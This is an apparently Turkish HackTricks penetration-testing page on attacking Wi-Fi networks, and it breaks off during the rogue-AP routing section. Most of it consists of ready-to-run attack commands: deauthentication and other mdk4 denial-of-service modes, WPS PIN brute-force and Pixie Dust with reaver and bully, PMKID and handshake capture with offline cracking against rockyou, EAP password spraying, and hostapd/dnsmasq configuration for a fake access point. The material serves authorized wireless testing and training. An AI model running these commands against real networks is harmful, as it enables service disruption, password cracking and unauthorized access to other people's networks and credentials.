Pentesting Wifi

Reading time: 33 minutes

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

Wifi temel komutları

bash
ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Araçlar

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

bash
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Docker ile airgeddon'u çalıştır

bash
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

wifiphisher

Evil Twin, KARMA ve Bilinen Beacon saldırılarını gerçekleştirebilir ve ardından bir phishing şablonu kullanarak ağın gerçek şifresini elde etmeyi veya sosyal ağ kimlik bilgilerini yakalamayı başarabilir.

bash
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Bu araç WPS/WEP/WPA-PSK saldırılarını otomatikleştirir. Otomatik olarak:

  • Arayüzü izleme moduna ayarlar
  • Olası ağları tarar - Ve kurban(ları) seçmenize izin verir
  • Eğer WEP ise - WEP saldırılarını başlatır
  • Eğer WPA-PSK ise
  • Eğer WPS ise: Pixie dust saldırısı ve brute-force saldırısı (brute-force saldırısının uzun sürebileceğine dikkat edin). Null PIN veya veritabanı/üretim PIN'lerini denemediğini unutmayın.
  • Kırmak için AP'den PMKID yakalamaya çalışır
  • Bir el sıkışma yakalamak için AP'nin istemcilerini deauthenticate etmeye çalışır
  • PMKID veya Handshake varsa, en iyi 5000 şifreyi kullanarak brute-force denemesi yapar.

Saldırı Özeti

  • DoS
  • Deauthentication/disassociation -- Herkesi (veya belirli bir ESSID/Müşteri) bağlantıdan ayır
  • Rastgele sahte AP'ler -- Ağları gizle, olası tarayıcıları çökert
  • AP'yi aşırı yükle -- AP'yi öldürmeye çalış (genellikle çok faydalı değildir)
  • WIDS -- IDS ile oyna
  • TKIP, EAPOL -- Bazı AP'lere DoS yapmak için belirli saldırılar
  • Kırma
  • WEP kırma (birçok araç ve yöntem)
  • WPA-PSK
  • WPS pin "Brute-Force"
  • WPA PMKID brute-force
  • [DoS +] WPA handshake yakalama + Kırma
  • WPA-MGT
  • Kullanıcı adı yakalama
  • Bruteforce Kimlik Bilgileri
  • Evil Twin (DoS ile veya olmadan)
  • Açık Evil Twin [+ DoS] -- Captive portal kimlik bilgilerini yakalamak ve/veya LAN saldırıları gerçekleştirmek için faydalıdır
  • WPA-PSK Evil Twin -- Şifreyi biliyorsanız ağ saldırıları için faydalıdır
  • WPA-MGT -- Şirket kimlik bilgilerini yakalamak için faydalıdır
  • KARMA, MANA, Loud MANA, Bilinen işaret
  • + Açık -- Captive portal kimlik bilgilerini yakalamak ve/veya LAN saldırıları gerçekleştirmek için faydalıdır
  • + WPA -- WPA el sıkışmalarını yakalamak için faydalıdır

DOS

Deauthentication Paketleri

Açıklama buradan:.

Deauthentication saldırıları, Wi-Fi hacking'inde yaygın bir yöntemdir ve "yönetim" çerçevelerini sahteleyerek cihazları bir ağdan zorla ayırmayı içerir. Bu şifrelenmemiş paketler, istemcileri meşru ağdan geldiklerine inandırarak, saldırganların kırma amaçları için WPA el sıkışmalarını toplamasına veya ağ bağlantılarını sürekli olarak kesintiye uğratmasına olanak tanır. Bu basit ama korkutucu taktik, yaygın olarak kullanılmakta ve ağ güvenliği üzerinde önemli etkileri bulunmaktadır.

Aireplay-ng kullanarak Deauthentication

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0, deauthentication anlamına gelir
  • 1, gönderilecek deauth sayısını belirtir (isterseniz birden fazla gönderebilirsiniz); 0, sürekli göndermek anlamına gelir
  • -a 00:14:6C:7E:40:80, erişim noktasının MAC adresidir
  • -c 00:0F:B5:34:30:30, deauthenticate edilecek istemcinin MAC adresidir; bu belirtilmezse, yayın deauthentication gönderilir (her zaman çalışmaz)
  • ath0, arayüz adıdır

Disassociation Packets

Disassociation paketleri, deauthentication paketlerine benzer şekilde, Wi-Fi ağlarında kullanılan bir yönetim çerçevesidir. Bu paketler, bir cihaz (örneğin bir dizüstü bilgisayar veya akıllı telefon) ile bir erişim noktası (AP) arasındaki bağlantıyı kesmek için kullanılır. Disassociation ve deauthentication arasındaki temel fark, kullanım senaryolarındadır. Bir AP, ağdan kötü niyetli cihazları açıkça kaldırmak için deauthentication paketleri yayarken, disassociation paketleri genellikle AP kapandığında, yeniden başlatıldığında veya yer değiştirdiğinde gönderilir; bu da bağlı tüm düğümlerin bağlantısının kesilmesini gerektirir.

Bu saldırı mdk4(mode "d") ile gerçekleştirilebilir:

bash
# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4 ile Daha Fazla DOS Saldırısı

Burada bulabilirsiniz.

SALDIRI MODU b: Beacon Flooding

Müşterilere sahte AP'leri göstermek için beacon çerçeveleri gönderir. Bu bazen ağ tarayıcılarını ve hatta sürücüleri çökertir!

bash
# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Kimlik Doğrulama Hizmet Dışı Bırakma

Erişim alanındaki tüm erişim noktalarına (AP) kimlik doğrulama çerçeveleri göndermek, özellikle birçok istemci söz konusu olduğunda bu AP'leri aşırı yükleyebilir. Bu yoğun trafik, sistem kararsızlığına yol açabilir ve bazı AP'lerin donmasına veya hatta sıfırlanmasına neden olabilir.

bash
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Access Point'ları (AP'ler) sorgulamak, bir SSID'nin düzgün bir şekilde ifşa edilip edilmediğini kontrol eder ve AP'nin menzilini doğrular. Bu teknik, gizli SSID'leri bir kelime listesi ile veya kelime listesi olmadan bruteforcing ile birleştirildiğinde, gizli ağları tanımlamak ve erişmekte yardımcı olur.

ATTACK MODE m: Michael Countermeasures Exploitation

Farklı QoS kuyruklarına rastgele veya kopya paketler göndermek, TKIP AP'ler üzerinde Michael Karşı Önlemlerini tetikleyebilir ve bir dakikalık AP kapatılmasına yol açabilir. Bu yöntem, etkili bir DoS (Hizmet Reddi) saldırı taktiğidir.

bash
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Başlangıç ve Logoff Paket Enjeksiyonu

Bir AP'yi EAPOL Başlangıç çerçeveleri ile doldurmak sahte oturumlar oluşturur, AP'yi aşırı yükler ve meşru istemcileri engeller. Alternatif olarak, sahte EAPOL Logoff mesajları enjekte etmek istemcileri zorla bağlantıdan ayırır, her iki yöntem de ağ hizmetini etkili bir şekilde kesintiye uğratır.

bash
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: IEEE 802.11s mesh ağları için Saldırılar

Mesh ağlarındaki bağlantı yönetimi ve yönlendirme üzerindeki çeşitli saldırılar.

ATTACK MODE w: WIDS Karışıklığı

Müşterileri birden fazla WDS düğümüne veya sahte kötü niyetli AP'lere çapraz bağlamak, Saldırı Tespit ve Önleme Sistemlerini manipüle edebilir, karışıklık yaratabilir ve potansiyel sistem kötüye kullanımı oluşturabilir.

bash
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Paket Fuzzer

Farklı paket kaynakları ve paket manipülasyonu için kapsamlı bir değiştirici seti sunan bir paket fuzzer.

Airggedon

Airgeddon önceki yorumlarda önerilen saldırıların çoğunu sunmaktadır:

WPS

WPS (Wi-Fi Korumalı Kurulum), cihazların bir yönlendiriciye bağlanma sürecini basitleştirir, WPA veya WPA2 Kişisel ile şifrelenmiş ağlar için kurulum hızını ve kolaylığını artırır. Kolayca tehlikeye atılabilen WEP güvenliği için etkisizdir. WPS, iki yarıda doğrulanan 8 haneli bir PIN kullanır ve sınırlı kombinasyon sayısı (11,000 olasılık) nedeniyle brute-force saldırılarına karşı savunmasızdır.

WPS Bruteforce

Bu eylemi gerçekleştirmek için 2 ana araç vardır: Reaver ve Bully.

  • Reaver, WPS'ye karşı sağlam ve pratik bir saldırı olarak tasarlanmış ve çeşitli erişim noktaları ve WPS uygulamaları üzerinde test edilmiştir.
  • Bully, C dilinde yazılmış yeni bir WPS brute force saldırı uygulamasıdır. Orijinal reaver koduna göre birkaç avantajı vardır: daha az bağımlılık, geliştirilmiş bellek ve CPU performansı, endianlık yönetiminde doğru işlem ve daha sağlam bir seçenek seti.

Saldırı, WPS PIN'in zayıflığını istismar eder, özellikle ilk dört hanenin ifşası ve son hanenin kontrol toplamı rolü, brute-force saldırısını kolaylaştırır. Ancak, saldırganların agresif MAC adreslerini engelleme gibi brute-force saldırılarına karşı savunmalar, saldırıya devam etmek için MAC adresi döngüsü gerektirir.

Bully veya Reaver gibi araçlarla WPS PIN elde edildikten sonra, saldırgan WPA/WPA2 PSK'sını çıkarabilir ve kalıcı ağ erişimi sağlayabilir.

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Akıllı Kaba Kuvvet

Bu rafine yaklaşım, bilinen güvenlik açıklarını kullanarak WPS PIN'lerini hedef alır:

  1. Önceden keşfedilmiş PIN'ler: Belirli üreticilere bağlı, standart WPS PIN'leri kullandığı bilinen PIN'lerin yer aldığı bir veritabanı kullanın. Bu veritabanı, MAC adreslerinin ilk üç oktetini bu üreticilere olası PIN'lerle ilişkilendirir.
  2. PIN Üretim Algoritmaları: AP'nin MAC adresine dayalı olarak WPS PIN'lerini hesaplayan ComputePIN ve EasyBox gibi algoritmaları kullanın. Arcadyan algoritması ayrıca bir cihaz kimliği gerektirir ve PIN üretim sürecine bir katman ekler.

WPS Pixie Dust saldırısı

Dominique Bongard, bazı Erişim Noktaları (AP'ler) ile ilgili gizli kodların, yani nonce'ların (E-S1 ve E-S2) oluşturulmasında bir hata keşfetti. Bu nonce'lar çözülebilirse, AP'nin WPS PIN'ini kırmak kolaylaşır. AP, meşru olduğunu ve sahte (rogue) bir AP olmadığını kanıtlamak için PIN'i özel bir kod (hash) içinde açığa çıkarır. Bu nonce'lar, WPS PIN'ini saklayan "kasa"yı açmanın "anahtarları" gibidir. Bununla ilgili daha fazla bilgi burada bulunabilir.

Basit terimlerle, sorun bazı AP'lerin bağlantı sürecinde PIN'i şifrelemek için yeterince rastgele anahtarlar kullanmamasıdır. Bu, PIN'in ağın dışından tahmin edilmesine (offline kaba kuvvet saldırısı) karşı savunmasız hale getirir.

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Cihazı izleme moduna geçirmek istemiyorsanız veya reaver ve bully ile ilgili bir sorun varsa, OneShot-C denemeyi düşünebilirsiniz. Bu araç, izleme moduna geçmeden Pixie Dust saldırısını gerçekleştirebilir.

bash
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin saldırısı

Bazı kötü tasarlanmış sistemler, erişim izni vermek için Null PIN (boş veya var olmayan PIN) kullanılmasına bile izin verir, bu oldukça alışılmadık bir durumdur. Reaver aracı, bu zafiyeti test etme yeteneğine sahiptir, Bully ise bunu yapamaz.

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Tüm önerilen WPS saldırıları airgeddon kullanılarak kolayca gerçekleştirilebilir.

  • 5 ve 6, özel PIN'inizi denemenize olanak tanır (eğer varsa)
  • 7 ve 8, Pixie Dust saldırısını gerçekleştirir
  • 13, NULL PIN'i test etmenizi sağlar
  • 11 ve 12, seçilen AP ile ilgili PIN'leri mevcut veritabanlarından toplar ve şu yöntemlerle olası PIN'ler oluşturur: ComputePIN, EasyBox ve isteğe bağlı olarak Arcadyan (tavsiye edilir, neden olmasın?)
  • 9 ve 10, her olası PIN'i test eder

WEP

Artık çok kırık ve kullanılmıyor. Sadece airgeddon'un bu tür bir korumayı saldırmak için "All-in-One" adında bir WEP seçeneği sunduğunu bilin. Daha fazla araç benzer seçenekler sunar.

WPA/WPA2 PSK

PMKID

2018'de, hashcat açıkladı yeni bir saldırı yöntemini, çünkü sadece bir tek paket gerektiriyor ve hedef AP'ye bağlı herhangi bir istemciye ihtiyaç duymuyor—sadece saldırgan ile AP arasında etkileşim gerekiyor.

Birçok modern yönlendirici, ilişkilendirme sırasında ilk EAPOL çerçevesine Robust Security Network olarak bilinen isteğe bağlı bir alan ekler. Bu, PMKID'yi içerir.

Orijinal gönderide açıklandığı gibi, PMKID bilinen veriler kullanılarak oluşturulur:

bash
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Verilen "PMK Adı" sabit olduğundan, AP'nin ve istasyonun BSSID'sini bildiğimizde, PMK tam bir 4-yol el sıkışmasından gelenle aynı olduğundan, hashcat bu bilgileri kullanarak PSK'yı kırabilir ve şifreyi geri alabilir!

Bu bilgileri toplamak ve şifreyi yerel olarak bruteforce etmek için şunları yapabilirsiniz:

bash
airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
bash
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKID'ler konsolda gösterilecek ve ayrıca /tmp/attack.pcap içine kaydedilecektir.
Şimdi, yakalamayı hashcat/john formatına dönüştürün ve kırın:

bash
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Lütfen doğru bir hash'in 4 parça içerdiğini unutmayın, örneğin: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Eğer sizin sadece 3 parça içeriyorsa, o zaman bu geçersizdir (PMKID yakalama geçerli değildi).

hcxdumptool aynı zamanda el sıkışmalarını da yakalar (şu şekilde bir şey görünecektir: MP:M1M2 RC:63258 EAPOLTIME:17091). El sıkışmaları cap2hccapx kullanarak hashcat/john formatına dönüştürülebilir.

bash
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Bu aracı kullanarak yakalanan bazı el sıkışmalarının doğru şifre bilinse bile kırılmadığını fark ettim. Mümkünse el sıkışmaları geleneksel yöntemle de yakalamayı veya bu aracı kullanarak birkaç tane yakalamayı öneririm.

El Sıkışma Yakalama

WPA/WPA2 ağlarına yönelik bir saldırı, bir el sıkışma yakalayarak ve şifreyi çevrimdışı kırmaya çalışarak gerçekleştirilebilir. Bu süreç, belirli bir ağın ve BSSID'nin belirli bir kanalda iletişimini izlemeyi içerir. İşte basit bir kılavuz:

  1. Hedef ağın BSSID'sini, kanalını ve bir bağlı istemciyi belirleyin.
  2. Belirtilen kanal ve BSSID üzerinde ağ trafiğini izlemek için airodump-ng kullanın, bir el sıkışma yakalamayı umarak. Komut şöyle görünecek:
bash
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  1. Bir el sıkışmasını yakalama şansını artırmak için, istemciyi ağa geçici olarak bağlanmaktan çıkararak yeniden kimlik doğrulama yapmaya zorlayın. Bu, istemciye dekimlik doğrulama paketleri gönderen aireplay-ng komutu kullanılarak yapılabilir:
bash
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Not edin ki, istemci deauthentikasyon edildiğinde farklı bir AP'ye veya diğer durumlarda farklı bir ağa bağlanmaya çalışabilir.

airodump-ng içinde bazı handshake bilgileri göründüğünde, bu handshake'in yakalandığı anlamına gelir ve dinlemeyi durdurabilirsiniz:

Handshake yakalandıktan sonra, bunu aircrack-ng ile çözebilirsiniz:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Dosyada el sıkışmasını kontrol et

aircrack

bash
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

bash
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Eğer bu araç, tamamlanmış bir el sıkışmadan önce bir ESSID'nin tamamlanmamış el sıkışmasını bulursa, geçerli olanı tespit edemez.

pyrit

bash
apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

Kurumsal WiFi kurulumlarında, çeşitli kimlik doğrulama yöntemleriyle karşılaşacaksınız, her biri farklı güvenlik seviyeleri ve yönetim özellikleri sunar. airodump-ng gibi araçları kullanarak ağ trafiğini incelediğinizde, bu kimlik doğrulama türleri için tanımlayıcılar fark edebilirsiniz. Bazı yaygın yöntemler şunlardır:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
  1. EAP-GTC (Generic Token Card):
  • Bu yöntem, EAP-PEAP içinde donanım token'ları ve tek kullanımlık şifreleri destekler. MSCHAPv2'nin aksine, bir eş zorlama kullanmaz ve şifreleri erişim noktasına düz metin olarak gönderir, bu da gerileme saldırıları için bir risk oluşturur.
  1. EAP-MD5 (Message Digest 5):
  • İstemciden şifrenin MD5 hash'ini göndermeyi içerir. Sözlük saldırılarına karşı savunmasız olması, sunucu kimlik doğrulaması eksikliği ve oturum bazlı WEP anahtarları oluşturma yeteneğinin olmaması nedeniyle tavsiye edilmez.
  1. EAP-TLS (Transport Layer Security):
  • Kimlik doğrulama için hem istemci tarafı hem de sunucu tarafı sertifikalarını kullanır ve iletişimleri güvence altına almak için kullanıcı bazlı ve oturum bazlı WEP anahtarları dinamik olarak oluşturabilir.
  1. EAP-TTLS (Tunneled Transport Layer Security):
  • Şifreli bir tünel aracılığıyla karşılıklı kimlik doğrulama sağlar ve dinamik, kullanıcı bazlı, oturum bazlı WEP anahtarlarını türetmek için bir yöntem sunar. Sadece sunucu tarafı sertifikaları gerektirir, istemciler kimlik bilgilerini kullanır.
  1. PEAP (Protected Extensible Authentication Protocol):
  • Korunan iletişim için bir TLS tüneli oluşturarak EAP ile benzer şekilde çalışır. Tünelin sağladığı koruma nedeniyle EAP'nin üstünde daha zayıf kimlik doğrulama protokollerinin kullanılmasına izin verir.
  • PEAP-MSCHAPv2: Genellikle PEAP olarak adlandırılır, savunmasız MSCHAPv2 zorlama/yanıt mekanizmasını koruyucu bir TLS tüneli ile birleştirir.
  • PEAP-EAP-TLS (veya PEAP-TLS): EAP-TLS'ye benzer, ancak sertifikaları değiştirmeden önce bir TLS tüneli başlatır ve ek bir güvenlik katmanı sunar.

Bu kimlik doğrulama yöntemleri hakkında daha fazla bilgi bulabilirsiniz burada ve burada.

Kullanıcı Adı Yakalama

https://tools.ietf.org/html/rfc3748#page-27 adresinde okuduğuma göre, EAP kullanıyorsanız "Kimlik" mesajlarının desteklenmesi gerekir ve kullanıcı adı, "Yanıt Kimliği" mesajlarında düz olarak gönderilecektir.

En güvenli kimlik doğrulama yöntemlerinden biri olan PEAP-EAP-TLS kullanılsa bile, EAP protokolünde gönderilen kullanıcı adını yakalamak mümkündür. Bunu yapmak için, bir kimlik doğrulama iletişimini yakalayın (bir kanalda airodump-ng başlatın ve aynı arayüzde wireshark kullanın) ve paketleri eapol ile filtreleyin.
"Yanıt, Kimlik" paketinin içinde, istemcinin kullanıcı adı görünecektir.

Anonim Kimlikler

Kimlik gizleme, hem EAP-PEAP hem de EAP-TTLS tarafından desteklenmektedir. Bir WiFi ağı bağlamında, EAP-Kimlik isteği genellikle erişim noktası (AP) tarafından ilişkilendirme sürecinde başlatılır. Kullanıcı anonimliğinin korunmasını sağlamak için, kullanıcının cihazındaki EAP istemcisinin yanıtı, ilk RADIUS sunucusunun isteği işlemek için gerekli olan temel bilgileri içerir. Bu kavram aşağıdaki senaryolarla açıklanmaktadır:

  • EAP-Kimlik = anonim
  • Bu senaryoda, tüm kullanıcılar kullanıcı tanımlayıcıları olarak takma ad "anonim" kullanır. İlk RADIUS sunucusu, PEAP veya TTLS protokolünün sunucu tarafını yönetmekten sorumlu olan bir EAP-PEAP veya EAP-TTLS sunucusu olarak işlev görür. İç (korunan) kimlik doğrulama yöntemi ya yerel olarak ya da uzaktaki (ev) RADIUS sunucusuna devredilir.
  • EAP-Kimlik = anonim@realm_x
  • Bu durumda, farklı alanlardan gelen kullanıcılar kimliklerini gizlerken kendi alanlarını belirtirler. Bu, ilk RADIUS sunucusunun EAP-PEAP veya EAP-TTLS isteklerini kendi ev alanlarındaki RADIUS sunucularına yönlendirmesine olanak tanır; bu sunucular PEAP veya TTLS sunucusu olarak işlev görür. İlk RADIUS sunucusu yalnızca bir RADIUS iletim düğümü olarak çalışır.
  • Alternatif olarak, ilk RADIUS sunucusu EAP-PEAP veya EAP-TTLS sunucusu olarak işlev görebilir ve ya korunan kimlik doğrulama yöntemini yönetebilir ya da başka bir sunucuya iletebilir. Bu seçenek, farklı alanlar için ayrı politikaların yapılandırılmasını kolaylaştırır.

EAP-PEAP'te, PEAP sunucusu ile PEAP istemcisi arasında TLS tüneli kurulduktan sonra, PEAP sunucusu bir EAP-Kimlik isteği başlatır ve bunu TLS tüneli aracılığıyla iletir. İstemci, bu ikinci EAP-Kimlik isteğine, kullanıcının gerçek kimliğini içeren bir EAP-Kimlik yanıtı göndererek yanıt verir. Bu yaklaşım, 802.11 trafiğini dinleyen herhangi birine kullanıcının gerçek kimliğinin ifşa edilmesini etkili bir şekilde engeller.

EAP-TTLS, biraz farklı bir prosedür izler. EAP-TTLS ile istemci genellikle PAP veya CHAP kullanarak kimlik doğrulaması yapar ve bu, TLS tüneli ile güvence altına alınır. Bu durumda, istemci, tünel kurulduktan sonra gönderilen ilk TLS mesajında bir Kullanıcı-Adı niteliği ve ya bir Şifre ya da CHAP-Şifre niteliği içerir.

Seçilen protokolden bağımsız olarak, PEAP/TTLS sunucusu, TLS tüneli kurulduktan sonra kullanıcının gerçek kimliğini öğrenir. Gerçek kimlik, user@realm veya basitçe user olarak temsil edilebilir. Eğer PEAP/TTLS sunucusu aynı zamanda kullanıcıyı kimlik doğrulamakla da sorumluysa, artık kullanıcının kimliğine sahiptir ve TLS tüneli ile korunan kimlik doğrulama yöntemine devam eder. Alternatif olarak, PEAP/TTLS sunucusu, kullanıcının ev RADIUS sunucusuna yeni bir RADIUS isteği iletebilir. Bu yeni RADIUS isteği, PEAP veya TTLS protokol katmanını atlar. Korunan kimlik doğrulama yöntemi EAP olduğunda, iç EAP mesajları, EAP-PEAP veya EAP-TTLS sarmalayıcısı olmadan ev RADIUS sunucusuna iletilir. Çıkan RADIUS mesajının Kullanıcı-Adı niteliği, gelen RADIUS isteğinden anonim Kullanıcı-Adı ile değiştirilerek kullanıcının gerçek kimliğini içerir. Korunan kimlik doğrulama yöntemi PAP veya CHAP (yalnızca TTLS tarafından desteklenir) olduğunda, TLS yükünden çıkarılan Kullanıcı-Adı ve diğer kimlik doğrulama nitelikleri, çıkan RADIUS mesajında anonim Kullanıcı-Adı ve gelen RADIUS isteğindeki TTLS EAP-Mesajı niteliklerinin yerini alacak şekilde değiştirilir.

Daha fazla bilgi için https://www.interlinknetworks.com/app_notes/eap-peap.htm adresine bakın.

EAP-Bruteforce (şifre spreyi)

Eğer istemcinin bir kullanıcı adı ve şifre kullanması bekleniyorsa (bu durumda EAP-TLS geçerli olmayacaktır), o zaman bir kullanıcı adı (bir sonraki bölüme bakın) ve şifreler listesi almayı deneyebilir ve erişimi bruteforce etmek için air-hammer kullanabilirsiniz.

bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Bu saldırıyı eaphammer kullanarak da gerçekleştirebilirsiniz:

bash
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Client saldırıları Teorisi

Ağ Seçimi ve Gezinme

  • 802.11 protokolü, bir istasyonun Genişletilmiş Hizmet Seti'ne (ESS) nasıl katılacağını tanımlar, ancak bir ESS veya içindeki bir erişim noktasını (AP) seçmek için kriterleri belirtmez.
  • İstasyonlar, aynı ESSID'yi paylaşan AP'ler arasında gezinebilir, bir bina veya alan boyunca bağlantıyı sürdürebilir.
  • Protokol, ESS'ye istasyon kimlik doğrulaması gerektirirken, AP'nin istasyona kimlik doğrulaması yapmasını zorunlu kılmaz.

Tercih Edilen Ağ Listeleri (PNL'ler)

  • İstasyonlar, bağlandıkları her kablosuz ağın ESSID'sini, ağ spesifik yapılandırma detaylarıyla birlikte Tercih Edilen Ağ Listesi'nde (PNL) saklar.
  • PNL, bilinen ağlara otomatik olarak bağlanmak için kullanılır ve bağlantı sürecini kolaylaştırarak kullanıcının deneyimini iyileştirir.

Pasif Tarama

  • AP'ler, varlıklarını ve özelliklerini duyuran sinyal çerçevelerini periyodik olarak yayınlar, AP'nin ESSID'sini de dahil eder, eğer yayın kapatılmamışsa.
  • Pasif tarama sırasında, istasyonlar sinyal çerçevelerini dinler. Eğer bir sinyalin ESSID'si istasyonun PNL'sindeki bir girişle eşleşirse, istasyon otomatik olarak o AP'ye bağlanabilir.
  • Bir cihazın PNL'sinin bilgisi, bilinen bir ağın ESSID'sini taklit ederek potansiyel istismar için olanak sağlar ve cihazı sahte bir AP'ye bağlanmaya kandırır.

Aktif Sorgulama

  • Aktif sorgulama, istasyonların yakınlardaki AP'leri ve özelliklerini keşfetmek için sorgu talepleri göndermesini içerir.
  • Yönlendirilmiş sorgu talepleri, belirli bir ESSID'yi hedef alır ve belirli bir ağın menzil içinde olup olmadığını tespit etmeye yardımcı olur, hatta gizli bir ağ olsa bile.
  • Yayın sorgu talepleri, boş bir SSID alanına sahiptir ve tüm yakınlardaki AP'lere gönderilir, bu da istasyonun PNL içeriğini açıklamadan herhangi bir tercih edilen ağı kontrol etmesine olanak tanır.

Basit AP ile İnternete Yönlendirme

Daha karmaşık saldırıları nasıl gerçekleştireceğini açıklamadan önce, sadece bir AP oluşturmanın ve trafik yönlendirmesinin nasıl yapılacağı açıklanacaktır İnternete bağlı bir arayüze.

ifconfig -a kullanarak AP'yi oluşturmak için wlan arayüzünün ve İnternete bağlı arayüzün mevcut olduğunu kontrol edin.

DHCP & DNS

bash
apt-get install dnsmasq #Manages DHCP and DNS

Aşağıdaki yapılandırma dosyasını oluşturun: /etc/dnsmasq.conf:

ini
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Sonra IP'leri ve yolları ayarlayın:

bash
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Ve sonra dnsmasq'ı başlatın:

bash
dnsmasq -C dnsmasq.conf -d

hostapd

bash
apt-get install hostapd

hostapd.conf adlı bir yapılandırma dosyası oluşturun:

ini
interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Rahatsız edici süreçleri durdurun, izleme modunu ayarlayın ve hostapd'yi başlatın:

bash
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Yönlendirme ve Yönlendirme

bash
